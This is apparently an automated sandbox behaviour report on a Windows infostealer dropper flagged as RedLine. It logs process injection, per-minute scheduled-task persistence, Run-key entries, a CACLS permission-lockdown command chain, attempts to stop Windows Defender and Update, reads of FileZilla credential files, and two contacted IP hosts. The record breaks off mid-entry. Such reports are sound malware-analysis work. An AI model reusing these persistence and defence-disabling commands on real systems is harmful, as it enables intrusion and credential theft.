file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\i6821669.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x1404399.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0
section .rsrc (virtual_address 0x0000c000, virtual_size 0x00117000, size_of_data 0x00116400, entropy 7.965348267589257) entropy 7.96534826759 description A section with a high entropy has been found
entropy 0.971628109996 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications smtp rule Network_SMTP_dotNet
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications smtp rule Network_SMTP_dotNet
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description RedLine stealer rule RedLine_Stealer_m_Zero
description Communications smtp rule Network_SMTP_dotNet
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications smtp rule Network_SMTP_dotNet
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000003a4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x000003a4
key_handle: 0x000003a0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000294
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000294
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2136
process_handle: 0x000002bc
3221225738 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2376
process_handle: 0x000002bc
3221225738 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
wmi SELECT * FROM Win32_Processor
host 185.161.248.25
host 77.91.124.20
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

NtAllocateVirtualMemory

process_identifier: 320
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

process_identifier: 2860
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002b8
1 0 0

NtAllocateVirtualMemory

process_identifier: 2272
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

process_identifier: 2376
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

NtAllocateVirtualMemory

process_identifier: 504
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

process_identifier: 1764
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x005b6470
service_name: WinDefend
control_code: 1
0 0

ControlService

service_handle: 0x005b67e0
service_name: wuauserv
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto0174.exe reg_value C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotocr23.exe reg_value C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP006.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP007.TMP\"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Process injection Process 2084 manipulating memory of non-child process 2136
Process injection Process 2444 manipulating memory of non-child process 2684
Process injection Process 1484 manipulating memory of non-child process 2376
Time & API Arguments Status Return Repeated

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 774144
process_identifier: 2136
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

process_identifier: 2136
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 16384
process_identifier: 2684
process_handle: 0x000002bc
1 0 0

NtAllocateVirtualMemory

process_identifier: 2684
region_size: 172032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
